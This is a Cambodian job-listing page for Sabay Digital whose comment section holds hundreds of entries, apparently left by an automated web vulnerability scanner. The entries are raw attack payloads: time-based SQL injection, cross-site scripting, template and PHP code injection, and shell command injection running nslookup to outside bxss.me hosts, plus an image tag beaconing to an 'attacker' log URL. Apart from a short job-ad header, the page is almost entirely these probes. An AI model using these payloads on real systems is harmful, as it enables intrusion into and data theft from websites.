ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

សប្បាយ ឌីជីថល
Sabay is a leading publisher of online entertainment and online content in Cambodia. Our portfolios include online computer games, web application development, payment solutions, music, video distribution and online web portal

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 23

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 8 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 03:43:11


  @@Iyj99


 • pHqghUme

  2021-05-06 03:43:07


  1'"


 • pHqghUme

  2021-05-06 03:43:05


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 03:42:45


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 03:42:21


  BR5AWFFN')) OR 269=(SELECT 269 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 03:42:03


  kKs8s0Jp') OR 672=(SELECT 672 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 03:41:48


  0Zkt5iF8' OR 248=(SELECT 248 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 03:41:32


  -1)) OR 307=(SELECT 307 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 03:41:14


  -5) OR 51=(SELECT 51 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 03:40:59


  -5 OR 294=(SELECT 294 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 03:40:43


  AiWzPqqW'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 03:40:26


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 03:40:07


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 03:39:48


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 03:39:32


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 03:39:14


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 03:38:58


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 03:38:42


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 03:38:28


  -1" OR 2+722-722-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 03:38:27


  -1' OR 2+350-350-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 03:38:27


  -1' OR 2+339-339-1=0+0+0+1 or 'ahvZfGmZ'='


 • pHqghUme

  2021-05-06 03:38:26


  -1 OR 2+514-514-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 03:38:26


  -1 OR 2+296-296-1=0+0+0+1


 • pHqghUme

  2021-05-06 03:38:25


  OBX51WSn


 • pHqghUme

  2021-05-06 03:38:09


  1


 • pHqghUme

  2021-05-06 03:37:46


  1


 • @@8CrrC

  2021-05-06 03:37:23


  1


 • 1'"

  2021-05-06 03:37:18


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 03:37:16


  1


 • GotN2ULV')) OR 675=(SELECT 675 FROM PG_SLEEP(15))--

  2021-05-06 03:36:52


  1


 • 9sKijyO4') OR 396=(SELECT 396 FROM PG_SLEEP(15))--

  2021-05-06 03:36:24


  1


 • mGZ3G2IL' OR 799=(SELECT 799 FROM PG_SLEEP(15))--

  2021-05-06 03:36:04


  1


 • uwfPLyRa'; waitfor delay '0:0:15' --

  2021-05-06 03:35:38


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 03:35:13


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 03:34:40


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 03:34:18


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 03:34:02


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 03:33:38


  1


 • -1" OR 2+829-829-1=0+0+0+1 --

  2021-05-06 03:33:18


  1


 • -1' OR 2+11-11-1=0+0+0+1 or 'F8YFvZqk'='

  2021-05-06 03:33:17


  1


 • -1' OR 2+622-622-1=0+0+0+1 --

  2021-05-06 03:33:16


  1


 • -1 OR 2+114-114-1=0+0+0+1 --

  2021-05-06 03:33:15


  1


 • -1 OR 2+368-368-1=0+0+0+1

  2021-05-06 03:33:15


  1


 • cX94G9IW

  2021-05-06 03:33:13


  1


 • pHqghUme

  2021-05-06 03:32:45


  1


 • pHqghUme

  2021-05-06 03:32:15


  1


 • pHqghUme

  2021-05-06 03:31:49


  1


 • pHqghUme

  2021-05-06 03:31:47


  1


 • pHqghUme

  2021-05-06 03:31:46


  1


 • pHqghUme

  2021-05-06 03:31:19


  1


 • pHqghUme

  2021-05-06 03:30:54


  1


 • pHqghUme

  2021-05-06 03:30:32


  1


 • pHqghUme

  2021-05-06 03:30:17


  1


 • pHqghUme

  2021-05-06 03:29:59


  1


 • pHqghUme

  2021-05-06 03:29:45


  1


 • pHqghUme

  2021-05-06 03:29:32


  1


 • pHqghUme

  2021-05-06 03:29:17


  1


 • pHqghUme

  2021-05-06 03:28:57


  1


 • pHqghUme

  2021-05-06 03:28:39


  1


 • pHqghUme

  2021-05-06 03:28:37


  1


 • pHqghUme

  2021-05-06 03:28:36


  1


 • pHqghUme

  2021-05-06 03:28:35


  1


 • pHqghUme

  2021-05-06 03:28:34


  1


 • pHqghUme

  2021-05-06 03:28:33


  1


 • pHqghUme

  2021-05-06 03:28:15


  1


 • pHqghUme

  2021-05-06 03:27:55


  1


 • pHqghUme

  2021-05-06 03:27:38


  1


 • pHqghUme

  2021-05-06 03:27:33


  1


 • pHqghUme

  2021-05-06 03:27:31


  1


 • pHqghUme

  2021-05-06 03:27:13


  1


 • pHqghUme

  2021-05-06 03:26:58


  1


 • pHqghUme

  2021-05-06 03:26:41


  1


 • pHqghUme

  2021-05-06 03:26:21


  1


 • pHqghUme

  2021-05-06 03:26:00


  1


 • pHqghUme

  2021-05-06 03:25:39


  1


 • pHqghUme

  2021-05-06 03:25:11


  1


 • pHqghUme

  2021-05-06 03:24:46


  1


 • pHqghUme

  2021-05-06 03:24:17


  1


 • pHqghUme

  2021-05-06 03:23:52


  1


 • pHqghUme

  2021-05-06 03:23:51


  1


 • pHqghUme

  2021-05-06 03:23:50


  1


 • pHqghUme

  2021-05-06 03:23:49


  1<fNBRHG<


 • pHqghUme

  2021-05-06 03:23:49


  1


 • pHqghUme

  2021-05-06 03:23:48


  1


 • pHqghUme

  2021-05-06 03:23:46


  1


 • pHqghUme

  2021-05-06 03:23:42


  1<img sRc='http://attacker-9294/log.php?


 • pHqghUme

  2021-05-06 03:23:37


  1<TesMzI x=9520>


 • pHqghUme

  2021-05-06 03:23:31


  1<ifRAme sRc=9775.com></IfRamE>


 • pHqghUme

  2021-05-06 03:23:25


  1<WGNBTF>DYGJ8[!+!]</WGNBTF>


 • pHqghUme

  2021-05-06 03:23:19


  1


 • pHqghUme

  2021-05-06 03:23:19


  1LN4qv <ScRiPt >LMC3(9804)</ScRiPt>


 • pHqghUme

  2021-05-06 03:23:13


  1<% contenteditable onresize=LMC3(9362)>


 • pHqghUme

  2021-05-06 03:23:07


  1}body{acu:Expre/**/SSion(LMC3(9386))}


 • pHqghUme

  2021-05-06 03:23:00


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 03:22:53


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 03:22:48


  1<input autofocus onfocus=LMC3(9404)>


 • pHqghUme

  2021-05-06 03:22:42


  1


 • pHqghUme

  2021-05-06 03:22:40


  1&lt;ScRiPt&gt;LMC3(9386)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 03:22:34


  1\u003CScRiPt\LMC3(9830)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 03:22:29


  %31%3C%53%63%52%69%50%74%20%3E%4C%4D%43%33%289924%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 03:22:24


  1<img/src=">" onerror=alert(9691)>


 • pHqghUme

  2021-05-06 03:22:19


  1<img src=xyz OnErRor=LMC3(9522)>


 • pHqghUme

  2021-05-06 03:22:14


  1<img src=//xss.bxss.me/t/dot.gif onload=LMC3(9307)>


 • pHqghUme

  2021-05-06 03:22:08


  1<body onload=LMC3(9948)>


 • pHqghUme

  2021-05-06 03:22:01


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9419'>


 • pHqghUme

  2021-05-06 03:21:56


  1<isindex type=image src=1 onerror=LMC3(9554)>


 • pHqghUme

  2021-05-06 03:21:49


  1<ScRiPt >LMC3(9710)</ScRiPt>


 • pHqghUme

  2021-05-06 03:21:43


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9252></ScRiPt>


 • pHqghUme

  2021-05-06 03:21:38


  1<ScRiPt >LMC3(9191)</ScRiPt>


 • pHqghUme

  2021-05-06 03:21:32


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4C%4D%43%33%28%39%37%32%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 03:21:26


  1<script>LMC3(9585)</script>


 • pHqghUme

  2021-05-06 03:21:19


  1<WWAZWJ>92YSD[!+!]</WWAZWJ>


 • pHqghUme

  2021-05-06 03:21:14


  1<ScRiPt >LMC3(9339)</ScRiPt>


 • pHqghUme

  2021-05-06 03:21:08


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 03:21:01


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 03:20:55


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 03:20:49


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 03:20:42


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 03:20:32


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 03:20:26


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 03:20:14


  acux10099%C0%BEz1%C0%BCz2a%90bcxuca10099


 • pHqghUme

  2021-05-06 03:20:04


  acu1509%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1509


 • pHqghUme

  2021-05-06 03:19:56


  19890414


 • pHqghUme

  2021-05-06 03:19:51


  '"()&%<acx><ScRiPt >LMC3(9411)</ScRiPt>


 • pHqghUme

  2021-05-06 03:19:46


  1'"()&%<acx><ScRiPt >LMC3(9037)</ScRiPt>


 • pHqghUme<92Pet3<

  2021-05-06 03:19:41


  1


 • pHqghUme<img sRc='http://attacker-9534/log.php?

  2021-05-06 03:19:34


  1


 • pHqghUme<wLqEtS x=9697>

  2021-05-06 03:19:29


  1


 • pHqghUme<ifRAme sRc=9569.com></IfRamE>

  2021-05-06 03:19:23


  1


 • pHqghUme<WPFRWC>XBWXG[!+!]</WPFRWC>

  2021-05-06 03:19:17


  1


 • pHqghUmeWpGzu <ScRiPt >LMC3(9332)</ScRiPt>

  2021-05-06 03:19:12


  1


 • pHqghUme<% contenteditable onresize=LMC3(9256)>

  2021-05-06 03:19:06


  1


 • pHqghUme}body{acu:Expre/**/SSion(LMC3(9589))}

  2021-05-06 03:19:02


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 03:18:57


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 03:18:52


  1


 • pHqghUme<input autofocus onfocus=LMC3(9673)>

  2021-05-06 03:18:47


  1


 • pHqghUme&lt;ScRiPt&gt;LMC3(9028)&lt;/sCripT&gt;

  2021-05-06 03:18:35


  1


 • pHqghUme\u003CScRiPt\LMC3(9564)\u003C/sCripT\u003E

  2021-05-06 03:18:26


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%4C%4D%43%33%289752%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 03:18:17


  1


 • pHqghUme

  2021-05-06 03:18:14


  1<64nyMB<


 • pHqghUme<img/src=">" onerror=alert(9464)>

  2021-05-06 03:18:07


  1


 • pHqghUme

  2021-05-06 03:18:03


  1<img sRc='http://attacker-9036/log.php?


 • pHqghUme<img src=xyz OnErRor=LMC3(9899)>

  2021-05-06 03:18:00


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=LMC3(9062)>

  2021-05-06 03:17:52


  1


 • pHqghUme

  2021-05-06 03:17:51


  1<ZgtK59 x=9317>


 • pHqghUme<body onload=LMC3(9805)>

  2021-05-06 03:17:47


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9011'>

  2021-05-06 03:17:40


  1


 • pHqghUme

  2021-05-06 03:17:38


  1<ifRAme sRc=9415.com></IfRamE>


 • pHqghUme<isindex type=image src=1 onerror=LMC3(9027)>

  2021-05-06 03:17:35


  1


 • pHqghUme

  2021-05-06 03:17:30


  1<WX1HDI>QX2RZ[!+!]</WX1HDI>


 • pHqghUme<ScRiPt >LMC3(9059)</ScRiPt>

  2021-05-06 03:17:27


  1


 • pHqghUme

  2021-05-06 03:17:23


  1NmALT <ScRiPt >KQGK(9296)</ScRiPt>


 • pHqghUme

  2021-05-06 03:17:21


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9072></ScRiPt>

  2021-05-06 03:17:21


  1


 • pHqghUme<ScRiPt >LMC3(9336)</ScRiPt>

  2021-05-06 03:17:17


  1


 • pHqghUme

  2021-05-06 03:17:14


  1<% contenteditable onresize=KQGK(9628)>


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4C%4D%43%33%28%39%37%37%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 03:17:12


  1


 • pHqghUme<ZyLqu7<

  2021-05-06 03:17:08


  1


 • pHqghUme<script>LMC3(9640)</script>

  2021-05-06 03:17:06


  1


 • pHqghUme

  2021-05-06 03:17:04


  1}body{acu:Expre/**/SSion(KQGK(9046))}


 • pHqghUme<WMWYPF>0QPQV[!+!]</WMWYPF>

  2021-05-06 03:17:02


  1


 • pHqghUme

  2021-05-06 03:16:59


  1


 • pHqghUme<img sRc='http://attacker-9692/log.php?

  2021-05-06 03:16:58


  1


 • pHqghUme<ScRiPt >LMC3(9408)</ScRiPt>

  2021-05-06 03:16:57


  1


 • pHqghUme

  2021-05-06 03:16:55


  <a HrEF=jaVaScRiPT:>


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 03:16:52


  1


 • pHqghUme<nRpHPK x=9261>

  2021-05-06 03:16:49


  1


 • acx__${98991*97996}__::.x

  2021-05-06 03:16:47


  1


 • pHqghUme

  2021-05-06 03:16:45


  <a HrEF=http://xss.bxss.me></a>


 • acx[[${98991*97996}]]xca

  2021-05-06 03:16:42


  1


 • pHqghUme<ifRAme sRc=9525.com></IfRamE>

  2021-05-06 03:16:39


  1


 • acx{{98991*97996}}xca

  2021-05-06 03:16:38


  1


 • pHqghUme

  2021-05-06 03:16:35


  1<input autofocus onfocus=KQGK(9026)>


 • pHqghUme

  2021-05-06 03:16:33


  1


 • pHqghUme<WMFYWL>DYYZQ[!+!]</WMFYWL>

  2021-05-06 03:16:28


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 03:16:27


  1


 • pHqghUme

  2021-05-06 03:16:22


  1


 • pHqghUmebiFI1 <ScRiPt >igKc(9603)</ScRiPt>

  2021-05-06 03:16:21


  1


 • <th:t="${acx}#foreach

  2021-05-06 03:16:18


  1


 • pHqghUme

  2021-05-06 03:16:17


  1&lt;ScRiPt&gt;KQGK(9799)&lt;/sCripT&gt;


 • pHqghUme<% contenteditable onresize=igKc(9566)>

  2021-05-06 03:16:13


  1


 • pHqghUme

  2021-05-06 03:16:12


  1


 • pHqghUme

  2021-05-06 03:16:11


  1\u003CScRiPt\KQGK(9292)\u003C/sCripT\u003E


 • <%={{={@{#{${acx}}%>

  2021-05-06 03:16:06


  1


 • pHqghUme

  2021-05-06 03:16:04


  %31%3C%53%63%52%69%50%74%20%3E%4B%51%47%4B%289507%29%3C%2F%73%43%72%69%70%54%3E


 • acux10361%C0%BEz1%C0%BCz2a%90bcxuca10361

  2021-05-06 03:16:02


  1


 • pHqghUme}body{acu:Expre/**/SSion(igKc(9321))}

  2021-05-06 03:16:00


  1


 • acu5054%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5054

  2021-05-06 03:15:55


  1


 • pHqghUme

  2021-05-06 03:15:55


  1<img/src=">" onerror=alert(9038)>


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 03:15:53


  1


 • pHqghUme9030864

  2021-05-06 03:15:49


  1


 • '"()&%<acx><ScRiPt >LMC3(9313)</ScRiPt>

  2021-05-06 03:15:46


  1


 • pHqghUme

  2021-05-06 03:15:46


  1<img src=xyz OnErRor=KQGK(9505)>


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 03:15:46


  1


 • pHqghUme'"()&%<acx><ScRiPt >LMC3(9227)</ScRiPt>

  2021-05-06 03:15:41


  1


 • pHqghUme<input autofocus onfocus=igKc(9095)>

  2021-05-06 03:15:39


  1


 • pHqghUme

  2021-05-06 03:15:37


  1


 • pHqghUme

  2021-05-06 03:15:35


  1<img src=//xss.bxss.me/t/dot.gif onload=KQGK(9024)>


 • pHqghUme

  2021-05-06 03:15:33


  1


 • pHqghUme

  2021-05-06 03:15:28


  1


 • pHqghUme&lt;ScRiPt&gt;igKc(9567)&lt;/sCripT&gt;

  2021-05-06 03:15:27


  1


 • pHqghUme

  2021-05-06 03:15:25


  1<body onload=KQGK(9655)>


 • pHqghUme

  2021-05-06 03:15:23


  1


 • pHqghUme\u003CScRiPt\igKc(9225)\u003C/sCripT\u003E

  2021-05-06 03:15:20


  1


 • pHqghUme

  2021-05-06 03:15:19


  1


 • pHqghUme

  2021-05-06 03:15:16


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 03:15:15


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 03:15:14


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 03:15:14


  1


 • pHqghUme

  2021-05-06 03:15:14


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 03:15:13


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 03:15:12


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%69%67%4B%63%289519%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 03:15:12


  1


 • ${@print(md5(31337))}\

  2021-05-06 03:15:11


  1


 • pHqghUme

  2021-05-06 03:15:11


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9275'>


 • '.print(md5(31337)).'

  2021-05-06 03:15:11


  1


 • pHqghUme

  2021-05-06 03:15:10


  '"


 • ${@print(md5(31337))}

  2021-05-06 03:15:10


  1


 • pHqghUme

  2021-05-06 03:15:10


  <!--


 • ";print(md5(31337));$a="

  2021-05-06 03:15:09


  1


 • <!--

  2021-05-06 03:15:09


  1


 • ';print(md5(31337));$a='

  2021-05-06 03:15:08


  1


 • '"

  2021-05-06 03:15:08


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 03:15:07


  1


 • pHqghUme

  2021-05-06 03:15:07


  1


 • pHqghUme

  2021-05-06 03:15:06


  1


 • pHqghUme

  2021-05-06 03:15:06


  1


 • pHqghUme

  2021-05-06 03:15:06


  1


 • pHqghUme

  2021-05-06 03:15:06


  1


 • pHqghUme

  2021-05-06 03:15:05


  1


 • pHqghUme

  2021-05-06 03:15:05


  1


 • pHqghUme

  2021-05-06 03:15:04


  1


 • pHqghUme

  2021-05-06 03:15:04


  1<isindex type=image src=1 onerror=KQGK(9791)>


 • pHqghUme

  2021-05-06 03:15:03


  1


 • pHqghUme

  2021-05-06 03:15:03


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 03:15:03


  1


 • pHqghUme

  2021-05-06 03:15:02


  1


 • pHqghUme

  2021-05-06 03:15:02


  '+'A'.concat(70-3).concat(22*4).concat(110).concat(72).concat(104).concat(76)+(require'socket' Socket.gethostbyname('hitnc'+'pxarfoto34bab.bxss.me.')[3].to_s)+'


 • /xfs.bxss.me

  2021-05-06 03:15:02


  1


 • pHqghUme

  2021-05-06 03:15:01


  '"()


 • pHqghUme

  2021-05-06 03:15:01


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 03:15:01


  1


 • pHqghUme<img/src=">" onerror=alert(9615)>

  2021-05-06 03:15:01


  1


 • pHqghUme

  2021-05-06 03:15:00


  1


 • pHqghUme

  2021-05-06 03:15:00


  1


 • pHqghUme

  2021-05-06 03:15:00


  "+"A".concat(70-3).concat(22*4).concat(120).concat(88).concat(120).concat(90)+(require"socket" Socket.gethostbyname("hitdo"+"hngydwesb992a.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 03:14:59


  1


 • "+"A".concat(70-3).concat(22*4).concat(109).concat(67).concat(102).concat(84)+(require"socket" Socket.gethostbyname("hitij"+"hsmpvoqoe7795.bxss.me.")[3].to_s)+"

  2021-05-06 03:14:59


  1


 • pHqghUme

  2021-05-06 03:14:59


  1


 • pHqghUme

  2021-05-06 03:14:59


  1


 • '+'A'.concat(70-3).concat(22*4).concat(109).concat(77).concat(114).concat(76)+(require'socket' Socket.gethostbyname('hittw'+'djygbzqf4e20f.bxss.me.')[3].to_s)+'

  2021-05-06 03:14:59


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 03:14:59


  1


 • pHqghUme

  2021-05-06 03:14:58


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 03:14:58


  1


 • pHqghUme

  2021-05-06 03:14:58


  1


 • pHqghUme

  2021-05-06 03:14:58


  1


 • '"()

  2021-05-06 03:14:57


  1


 • pHqghUme

  2021-05-06 03:14:57


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 03:14:57


  1


 • pHqghUme

  2021-05-06 03:14:57


  1


 • pHqghUme

  2021-05-06 03:14:56


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 03:14:56


  1


 • pHqghUme

  2021-05-06 03:14:56


  ".gethostbyname(lc("hittr"."sgauyhdh74630.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(68).chr(107).chr(82)."


 • pHqghUme

  2021-05-06 03:14:56


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 03:14:56


  1


 • ".gethostbyname(lc("hiteh"."shcqcdwx62bfe.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(79).chr(121).chr(90)."

  2021-05-06 03:14:55


  1


 • pHqghUme

  2021-05-06 03:14:55


  1


 • pHqghUme

  2021-05-06 03:14:55


  1


 • pHqghUme

  2021-05-06 03:14:55


  '.gethostbyname(lc('hitry'.'hwbabyws9ea89.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(75).chr(119).chr(86).'


 • '.gethostbyname(lc('hithd'.'gbxbfslza3183.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(87).chr(118).chr(70).'

  2021-05-06 03:14:54


  1


 • pHqghUme

  2021-05-06 03:14:54


  1


 • pHqghUme<img src=xyz OnErRor=igKc(9971)>

  2021-05-06 03:14:53


  1


 • pHqghUme

  2021-05-06 03:14:52


  1


 • pHqghUme

  2021-05-06 03:14:52


  1


 • pHqghUme

  2021-05-06 03:14:51


  1


 • pHqghUme

  2021-05-06 03:14:50


  1


 • pHqghUme

  2021-05-06 03:14:49


  1


 • pHqghUme

  2021-05-06 03:14:48


  1


 • pHqghUme

  2021-05-06 03:14:48


  1


 • pHqghUme

  2021-05-06 03:14:47


  `(nslookup hitaprvkhrdcwe4c6e.bxss.me||perl -e "gethostbyname('hitaprvkhrdcwe4c6e.bxss.me')")`


 • pHqghUme

  2021-05-06 03:14:47


  1<ScRiPt >KQGK(9119)</ScRiPt>


 • pHqghUme

  2021-05-06 03:14:46


  !(()&&!|*|*|


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=igKc(9937)>

  2021-05-06 03:14:46


  1


 • pHqghUme

  2021-05-06 03:14:46


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 03:14:46


  |(nslookup hitmpziwzawfn6af2d.bxss.me||perl -e "gethostbyname('hitmpziwzawfn6af2d.bxss.me')")


 • ^(#$!@#$)(()))******

  2021-05-06 03:14:45


  1


 • pHqghUme

  2021-05-06 03:14:45


  )


 • !(()&&!|*|*|

  2021-05-06 03:14:44


  1


 • pHqghUme

  2021-05-06 03:14:43


  1


 • )

  2021-05-06 03:14:43


  1


 • pHqghUme

  2021-05-06 03:14:42


  1


 • pHqghUme

  2021-05-06 03:14:42


  (nslookup hitwfqqrdldjr576c5.bxss.me||perl -e "gethostbyname('hitwfqqrdldjr576c5.bxss.me')")


 • pHqghUme

  2021-05-06 03:14:42


  1


 • pHqghUme

  2021-05-06 03:14:42


  $(nslookup hitedejrnwlkr569d4.bxss.me||perl -e "gethostbyname('hitedejrnwlkr569d4.bxss.me')")


 • pHqghUme

  2021-05-06 03:14:41


  &echo hbzfez$()\ vjazvr\nz^xyu||a #' &echo hbzfez$()\ vjazvr\nz^xyu||a #|" &echo hbzfez$()\ vjazvr\nz^xyu||a #


 • pHqghUme

  2021-05-06 03:14:41


  1


 • pHqghUme

  2021-05-06 03:14:41


  |echo havoty$()\ cgvebf\nz^xyu||a #' |echo havoty$()\ cgvebf\nz^xyu||a #|" |echo havoty$()\ cgvebf\nz^xyu||a #


 • pHqghUme

  2021-05-06 03:14:40


  1


 • pHqghUme

  2021-05-06 03:14:40


  echo mfwvnq$()\ cjmlbe\nz^xyu||a #' &echo mfwvnq$()\ cjmlbe\nz^xyu||a #|" &echo mfwvnq$()\ cjmlbe\nz^xyu||a #


 • pHqghUme

  2021-05-06 03:14:40


  1


 • pHqghUme<body onload=igKc(9913)>

  2021-05-06 03:14:39


  1


 • pHqghUme

  2021-05-06 03:14:38


  1&n973494=v994856


 • pHqghUme

  2021-05-06 03:14:38


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 03:14:38


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9433></ScRiPt>


 • `(nslookup hitwrwhsmehda5da56.bxss.me||perl -e "gethostbyname('hitwrwhsmehda5da56.bxss.me')")`

  2021-05-06 03:14:36


  1


 • pHqghUme

  2021-05-06 03:14:35


  http://bxss.me/t/fit.txt%3F.jpg


 • |(nslookup hitvhwqoctzto01bb1.bxss.me||perl -e "gethostbyname('hitvhwqoctzto01bb1.bxss.me')")

  2021-05-06 03:14:35


  1


 • pHqghUme

  2021-05-06 03:14:35


  bxss.me


 • pHqghUme

  2021-05-06 03:14:34


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 03:14:34


  Http://bxss.me/t/fit.txt


 • bxss.me

  2021-05-06 03:14:33


  1


 • pHqghUme&n943005=v925471

  2021-05-06 03:14:33


  1


 • pHqghUme

  2021-05-06 03:14:33


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 03:14:32


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 03:14:32


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9536'>

  2021-05-06 03:14:32


  1


 • (nslookup hitutswlxvdaua8d54.bxss.me||perl -e "gethostbyname('hitutswlxvdaua8d54.bxss.me')")

  2021-05-06 03:14:31


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 03:14:31


  1


 • $(nslookup hitldsqikactv2b4f7.bxss.me||perl -e "gethostbyname('hitldsqikactv2b4f7.bxss.me')")

  2021-05-06 03:14:31


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 03:14:31


  1


 • pHqghUme

  2021-05-06 03:14:30


  1


 • &echo lbipjt$()\ sjcggq\nz^xyu||a #' &echo lbipjt$()\ sjcggq\nz^xyu||a #|" &echo lbipjt$()\ sjcggq\nz^xyu||a #

  2021-05-06 03:14:30


  1


 • pHqghUme

  2021-05-06 03:14:30


  1<ScRiPt >KQGK(9479)</ScRiPt>


